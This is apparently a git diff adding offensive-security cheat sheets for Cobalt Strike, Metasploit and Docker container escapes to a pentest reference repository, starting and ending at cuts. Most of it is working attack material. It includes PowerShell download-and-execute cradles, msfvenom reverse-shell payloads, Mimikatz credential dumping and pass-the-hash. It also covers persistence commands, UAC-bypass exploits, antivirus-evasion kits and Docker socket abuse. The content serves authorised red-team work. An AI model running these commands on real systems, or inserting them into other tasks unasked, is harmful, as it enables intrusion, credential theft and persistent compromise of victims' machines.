Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) +* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) +* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE) +* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) +* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) +* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html) +* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) +* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file diff --git a/docs/cloud/test/B.md b/docs/cloud/azure/access-and-token.md similarity index 100% rename from docs/cloud/test/B.md rename to docs/cloud/azure/access-and-token.md diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md new file mode 100644 index 0000000..e69de29 diff --git a/docs/cloud/test/A.md b/docs/cloud/azure/enumeration.md similarity index 100% rename from docs/cloud/test/A.md rename to docs/cloud/azure/enumeration.md diff --git a/docs/command-control/Cobalt Strike - Cheatsheet.md b/docs/command-control/Cobalt Strike - Cheatsheet.md new file mode 100644 index 0000000..e84435c --- /dev/null +++ b/docs/command-control/Cobalt Strike - Cheatsheet.md @@ -0,0 +1,491 @@ +# Cobalt Strike + +> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity. + + +```powershell +$ sudo apt-get update +$ sudo apt-get install openjdk-11-jdk +$ sudo apt install proxychains socat +$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64 +$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile] +$ ./cobaltstrike +$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" +``` + +## Summary + +* [Infrastructure](#infrastructure) + * [Redirectors](#redirectors) + * [Domain fronting](#domain-fronting) +* [OpSec](#opsec) + * [Customer ID](#customer-id) +* [Payloads](#payloads) + * [DNS Beacon](#dns-beacon) + * [SMB Beacon](#smb-beacon) + * [Metasploit compatibility](#metasploit-compatibility) + * [Custom Payloads](#custom-payloads) +* [Malleable C2](#malleable-c2) +* [Files](#files) +* [Powershell and .NET](#powershell-and-net) + * [Powershell commabds](#powershell-commands) + * [.NET remote execution](#net-remote-execution) +* [Lateral Movement](#lateral-movement) +* [VPN & Pivots](#vpn--pivots) +* [Kits](#kits) + * [Elevate Kit](#elevate-kit) + * [Persistence Kit](#persistence-kit) + * [Resource Kit](#resource-kit) + * [Artifact Kit](#artifact-kit) + * [Mimikatz Kit](#mimikatz-kit) + * [Sleep Mask Kit](#sleep-mask-kit) + * [Thread Stack Spoofer](#thread-stack-spoofer) +* [Beacon Object Files](#beacon-object-files) +* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) +* [References](#references) + + +## Infrastructure + +### Redirectors + +```powershell +sudo apt install socat +socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 +``` + +### Domain Fronting + +* New Listener > HTTP Host Header +* Choose a domain in "Finance & Healthcare" sector + +## OpSec + +**Don't** +* Use default self-signed HTTPS certificate +* Use default port (50050) +* Use 0.0.0.0 DNS response +* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` + +**Do** +* Use a redirector (Apache, CDN, ...) +* Firewall to only accept HTTP/S from the redirectors +* Firewall 50050 and access via SSH tunnel +* Edit default HTTP 404 page and Content type: text/plain +* No staging `set hosts_stage` to `false` in Malleable C2 +* Use Malleable Profile to taylor your attack to specific actors + +### Customer ID + +> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike. + +* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later. +* The trial has a Customer ID value of 0. +* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool + +## Payloads + +### DNS Beacon + +* Edit the Zone File for the domain +* Create an A record for Cobalt Strike system +* Create an NS record that points to FQDN of your Cobalt Strike system + +Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record. + +* nslookup jibberish.beacon polling.campaigns.domain.com +* nslookup jibberish.beacon campaigns.domain.com + +Example of DNS on Digital Ocean: + +```powershell +NS example.com directs to 10.10.10.10. 86400 +NS polling.campaigns.example.com directs to campaigns.example.com. 3600 +A campaigns.example.com directs to 10.10.10.10 3600 +``` + +```powershell +systemctl disable systemd-resolved +systemctl stop systemd-resolved +rm /etc/resolv.conf +echo "nameserver 8.8.8.8" > /etc/resolv.conf +echo "nameserver 8.8.4.4" >> /etc/resolv.conf +``` + +Configuration: +1. **host**: campaigns.domain.com +2. **beacon**: polling.campaigns.domain.com +3. Interact with a beacon, and `sleep 0` + + +### SMB Beacon + +```powershell +link [host] [pipename] +connect [host] [port] +unlink [host] [PID] +jump [exec] [host] [pipe] +``` + +SMB Beacon uses Named Pipes. You might encounter these error code while running it. + +| Error Code | Meaning | Description | +|------------|----------------------|----------------------------------------------------| +| 2 | File Not Found | There is no beacon for you to link to | +| 5 | Access is denied | Invalid credentials or you don't have permission | +| 53 | Bad Netpath | You have no trust relationship with the target system. It may or may not be a beacon there. | + + +### SSH Beacon + +```powershell +# deploy a beacon +beacon> help ssh +Use: ssh [target:port] [user] [pass] +Spawn an SSH client and attempt to login to the specified target + +beacon> help ssh-key +Use: ssh [target:port] [user] [/path/to/key.pem] +Spawn an SSH client and attempt to login to the specified target + +# beacon's commands +upload Upload a file +download Download a file +socks Start SOCKS4a server to relay traffic +sudo Run a command via sudo +rportfwd Setup a reverse port forward +shell Execute a command via the shell +``` + +### Metasploit compatibility + +* Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https +* Set LHOST and LPORT to the beacon +* Set DisablePayloadHandler to True +* Set PrependMigrate to True +* exploit -j + +### Custom Payloads + +https://ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c + +```powershell +* Attacks > Packages > Payload Generator +* Attacks > Packages > Scripted Web Delivery (S) +$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor +$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml +$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml +``` + +## Malleable C2 + +List of Malleable Profiles hosted on Github +* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles +* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 +* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles +* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint + +Example of syntax + +```powershell +set useragent "SOME AGENT"; # GOOD +set useragent 'SOME AGENT'; # BAD +prepend "This is an example;"; + +# Escape Double quotes +append "here is \"some\" stuff"; +# Escape Backslashes +append "more \\ stuff"; +# Some special characters do not need escaping +prepend "!@#$%^&*()"; +``` + +Check a profile with `./c2lint`. +* A result of 0 is returned if c2lint completes with no errors +* A result of 1 is returned if c2lint completes with only warnings +* A result of 2 is returned if c2lint completes with only errors +* A result of 3 is returned if c2lint completes with both errors and warning + +## Files + +```powershell +# List the file on the specified directory +beacon > ls + +# Change into the specified working directory +beacon > cd [directory] + +# Delete a file\folder +beacon > rm [file\folder] + +# File copy +beacon > cp [src] [dest] + +# Download a file from the path on the Beacon host +beacon > download [C:\filePath] + +# Lists downloads in progress +beacon > downloads + +# Cancel a download currently in progress +beacon > cancel [*file*] + +# Upload a file from the attacker to the current Beacon host +beacon > upload [/path/to/file] +``` + +## Powershell and .NET + +### Powershell commands + +```powershell +# Import a Powershell .ps1 script from the control server and save it in memory in Beacon +beacon > powershell-import [/path/to/script.ps1] + +# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned. +beacon > powershell [commandlet][arguments] + +# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto +beacon > powerpick [commandlet] [argument] + +# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs +beacon > psinject [pid][arch] [commandlet] [arguments] +``` + +### .NET remote execution + +Run a local .NET executable as a Beacon post-exploitation job. + +Require: +* Binaries compiled with the "Any CPU" configuration. + +```powershell +beacon > execute-assembly [/path/to/script.exe] [arguments] +beacon > execute-assembly /home/audit/Rubeus.exe +[*] Tasked beacon to run .NET program: Rubeus.exe +[+] host called home, sent: 318507 bytes +[+] received output: + + ______ _ + (_____ \ | | + _____) )_ _| |__ _____ _ _ ___ + | __ /| | | | _ \| ___ | | | |/___) + | | \ \| |_| | |_) ) ____| |_| |___ | + |_| |_|____/|____/|_____)____/(___/ + + v1.4.2 +``` + +## Lateral Movement + +:warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe + +- **portscan:** Performs a portscan on a specific target. +- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. +- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ +:exclamation: This module needs Administrator privileges. +- **steal_token:** Steal a token from a specified process. +- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user. +- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \ +:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \ +:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network. +- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \ +:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target. +- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts. + +:warning: All the commands launch powershell.exe + +```powershell +Beacon Remote Exploits +====================== +jump [module] [target] [listener] + + psexec x86 Use a service to run a Service EXE artifact + psexec64 x64 Use a service to run a Service EXE artifact + psexec_psh x86 Use a service to run a PowerShell one-liner + winrm x86 Run a PowerShell script via WinRM + winrm64 x64 Run a PowerShell script via WinRM + +Beacon Remote Execute Methods +============================= +remote-exec [module] [target] [command] + + Methods Description + ------- ----------- + psexec Remote execute via Service Control Manager + winrm Remote execute via WinRM (PowerShell) + wmi Remote execute via WMI (PowerShell) + +``` + +Opsec safe Pass-the-Hash: +1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"` +2. `steal_token PID` + +### Assume Control of Artifact + +* Use `link` to connect to SMB Beacon +* Use `connect` to connect to TCP Beacon + + +## VPN & Pivots + +:warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy. + +> Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second. + +```powershell +# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage. +beacon > socks [PORT] +beacon > socks [port] +beacon > socks [port] [socks4] +beacon > socks [port] [socks5] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] +beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging] + +# Proxy browser traffic through a specified Internet Explorer process. +beacon > browserpivot [pid] [x86|x64] + +# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port. +beacon > rportfwd [bind port] [forward host] [forward port] + +# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn. +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin +beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin + +# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller +# then you can handle the connect back on your MSF multi handler +beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin +``` + +## Kits + +* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike + +### Elevate Kit + +UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018) + +```powershell +beacon> runasadmin + +Beacon Command Elevators +======================== + + Exploit Description + ------- ----------- + ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113) + ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701) + ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051) + svc-exe Get SYSTEM via an executable run as a service + uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup) + uac-token-duplication Bypass UAC with Token Duplication +``` + +### Persistence Kit + +* https://github.com/0xthirteen/MoveKit +* https://github.com/fireeye/SharPersist + ```powershell + # List persistences + SharPersist -t schtaskbackdoor -m list + SharPersist -t startupfolder -m list + SharPersist -t schtask -m list + + # Add a persistence + SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add + SharPersist -t schtaskbackdoor -n "Something Cool" -m remove + + SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add + SharPersist -t service -n "Some Service" -m remove + + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add + SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly + SharPersist -t schtask -n "Some Task" -m remove + ``` + +### Resource Kit + +> The Resource Kit is Cobalt Strike's means to change the HTA, PowerShell, Python, VBA, and VBS script templates Cobalt Strike uses in its workflows + +### Artifact Kit + +> Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique's folder. + +Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : + +- Download the artifact kit : `Go to Help -> Arsenal to download Artifact Kit (requires a licensed version of Cobalt Strike)` +- Install the dependencies : `sudo apt-get install mingw-w64` +- Edit the Artifact code + * Change pipename strings + * Change `VirtualAlloc` in `patch.c`/`patch.exe`, e.g: HeapAlloc + * Change Import +- Build the Artifact +- Cobalt Strike -> Script Manager > Load .cna + +### Mimikatz Kit + +* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724) +* Load the mimikatz.cna aggressor script +* Use mimikatz functions as normal + +### Sleep Mask Kit + +> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. + +Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. + +### Thread Stack Spoofer + +> An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. + +Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. + +## Beacon Object Files + +> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs + +Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h + +* Compile + ```ps1 + # To compile this with Visual Studio: + cl.exe /c /GS- hello.c /Fohello.o + + # To compile this with x86 MinGW: + i686-w64-mingw32-gcc -c hello.c -o hello.o + + # To compile this with x64 MinGW: + x86_64-w64-mingw32-gcc -c hello.c -o hello.o + ``` +* Execute: `inline-execute /path/to/hello.o` + +## NTLM Relaying via Cobalt Strike + +```powershell +beacon> socks 1080 +kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb:// +beacon> rportfwd_local 8445 445 +beacon> upload C:\Tools\PortBender\WinDivert64.sys +beacon> PortBender redirect 445 8445 +``` + +## References + +* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) +* [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0) +* [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao) +* [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk) +* [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8) +* [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw) +* [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io) +* [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0) +* [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s) +* [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018 ](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) +* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) +* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) +* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) +* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) +* [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf) diff --git a/docs/command-control/Metasploit - Cheatsheet.md b/docs/command-control/Metasploit - Cheatsheet.md new file mode 100644 index 0000000..bf3917b --- /dev/null +++ b/docs/command-control/Metasploit - Cheatsheet.md @@ -0,0 +1,234 @@ +# Metasploit + +## Summary + +* [Installation](#installation) +* [Sessions](#sessions) +* [Background handler](#background-handler) +* [Meterpreter - Basic](#meterpreter---basic) + * [Generate a meterpreter](#generate-a-meterpreter) + * [Meterpreter Webdelivery](#meterpreter-webdelivery) + * [Get System](#get-system) + * [Persistence Startup](#persistence-startup) + * [Network Monitoring](#network-monitoring) + * [Portforward](#portforward) + * [Upload / Download](#upload---download) + * [Execute from Memory](#execute-from-memory) + * [Mimikatz](#mimikatz) + * [Pass the Hash - PSExec](#pass-the-hash---psexec) + * [Use SOCKS Proxy](#use-socks-proxy) +* [Scripting Metasploit](#scripting-metasploit) +* [Multiple transports](#multiple-transports) +* [Best of - Exploits](#best-of---exploits) +* [References](#references) + +## Installation + +```powershell +curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall +``` + +## Sessions + +```powershell +CTRL+Z -> Session in Background +sessions -> List sessions +sessions -i session_number -> Interact with Session with id +sessions -u session_number -> Upgrade session to a meterpreter +sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter + +sessions -c cmd -> Execute a command on several sessions +sessions -i 10-20 -c "id" -> Execute a command on several sessions +``` + +## Background handler + +ExitOnSession : the handler will not exit if the meterpreter dies. + +```powershell +screen -dRR +sudo msfconsole + +use exploit/multi/handler +set PAYLOAD generic/shell_reverse_tcp +set LHOST 0.0.0.0 +set LPORT 4444 +set ExitOnSession false + +generate -o /tmp/meterpreter.exe -f exe +to_handler + +[ctrl+a] + [d] +``` + +## Meterpreter - Basic + +### Generate a meterpreter + +```powershell +$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe +$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho +$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp +$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war +$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py +$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh +$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl +``` + +### Meterpreter Webdelivery + +Set up a Powershell web delivery listening on port 8080. + +```powershell +use exploit/multi/script/web_delivery +set TARGET 2 +set payload windows/x64/meterpreter/reverse_http +set LHOST 10.0.0.1 +set LPORT 4444 +run +``` + +```powershell +powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB'); +``` + + +### Get System + +```powershell +meterpreter > getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` + +### Persistence Startup + +```powershell +OPTIONS: + +-A Automatically start a matching exploit/multi/handler to connect to the agent +-L Location in target host to write payload to, if none %TEMP% will be used. +-P Payload to use, default is windows/meterpreter/reverse_tcp. +-S Automatically start the agent on boot as a service (with SYSTEM privileges) +-T Alternate executable template to use +-U Automatically start the agent when the User logs on +-X Automatically start the agent when the system boots +-h This help menu +-i The interval in seconds between each connection attempt +-p The port on which the system running Metasploit is listening +-r The IP of the system running Metasploit listening for the connect back + +meterpreter > run persistence -U -p 4242 +``` + +### Network Monitoring + +```powershell +# list interfaces +run packetrecorder -li + +# record interface n°1 +run packetrecorder -i 1 +``` + +### Portforward + +```powershell +portfwd add -l 7777 -r 172.17.0.2 -p 3006 +``` + +### Upload / Download + +```powershell +upload /path/in/hdd/payload.exe exploit.exe +download /path/in/victim +``` + +### Execute from Memory + +```powershell +execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w +``` + +### Mimikatz + +```powershell +load mimikatz +mimikatz_command -f version +mimikatz_command -f samdump::hashes +mimikatz_command -f sekurlsa::wdigest +mimikatz_command -f sekurlsa::searchPasswords +mimikatz_command -f sekurlsa::logonPasswords full +``` + +```powershell +load kiwi +creds_all +golden_ticket_create -d -k -s -u -t +``` + +### Pass the Hash - PSExec + +```powershell +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp +msf exploit(psexec) > exploit +SMBDomain WORKGROUP no The Windows domain to use for authentication +SMBPass 598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf no The password for the specified username +SMBUser Lambda no The username to authenticate as +``` + +### Use SOCKS Proxy + +```powershell +setg Proxies socks4:127.0.0.1:1080 +``` + +## Scripting Metasploit + +Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`. +Here is a simple example to script the deployment of a handler an create an Office doc with macro. + +```powershell +use exploit/multi/handler +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 0.0.0.0 +set LPORT 4646 +set ExitOnSession false +exploit -j -z + + +use exploit/multi/fileformat/office_word_macro +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 10.10.14.22 +set LPORT 4646 +exploit +``` + +## Multiple transports + +```powershell +msfvenom -p windows/meterpreter_reverse_tcp lhost= lport= sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe +``` + +Then, in AddTransports.ps1 + +```powershell +Add-TcpTransport -lhost -lport -RetryWait 10 -RetryTotal 30 +Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 30 +``` + +## Best of - Exploits + +* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue` +* MS08_67 - `exploit/windows/smb/ms08_067_netapi` + +## References + +* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) +* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331) \ No newline at end of file diff --git a/docs/containers/Container - Docker Pentest.md b/docs/containers/Container - Docker Pentest.md new file mode 100644 index 0000000..eff3dc6 --- /dev/null +++ b/docs/containers/Container - Docker Pentest.md @@ -0,0 +1,250 @@ +# Container - Docker + +> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. + +## Summary + +- [Tools](#tools) +- [Mounted Docker Socket](#mounted-docker-socket) +- [Open Docker API Port](#open-docker-api-port) +- [Insecure Docker Registry](#insecure-docker-registry) +- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) + - [Abusing CAP_SYS_ADMIN capability](#abusing-capsysadmin-capability) + - [Abusing coredumps and core_pattern](#abusing-coredumps-and-corepattern) +- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) +- [References](#references) + +## Tools + +* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations + ```powershell + dockscan unix:///var/run/docker.sock + dockscan -r html -o myreport -v tcp://example.com:5422 + ``` +* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) + ```powershell + ./deepce.sh + ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce + ./deepce.sh --no-enumeration --exploit SOCK --shadow + ./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked" + ``` + +## Mounted Docker Socket + +Prerequisite: +* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` + +Usually found in `/var/run/docker.sock`, for example for Portainer. + +```powershell +curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json +curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create +curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start +``` + +Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) + +```powershell +root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true +[+] Hunt dem Socks +[+] Hunting Down UNIX Domain Sockets from: /var/run/ +[*] Valid Socket: /var/run/docker.sock +[+] Attempting to autopwn +[+] Hunting Docker Socks +[+] Attempting to Autopwn: /var/run/docker.sock +[*] Getting Docker client... +[*] Successfully got Docker client... +[+] Attempting to escape to host... +[+] Attempting in 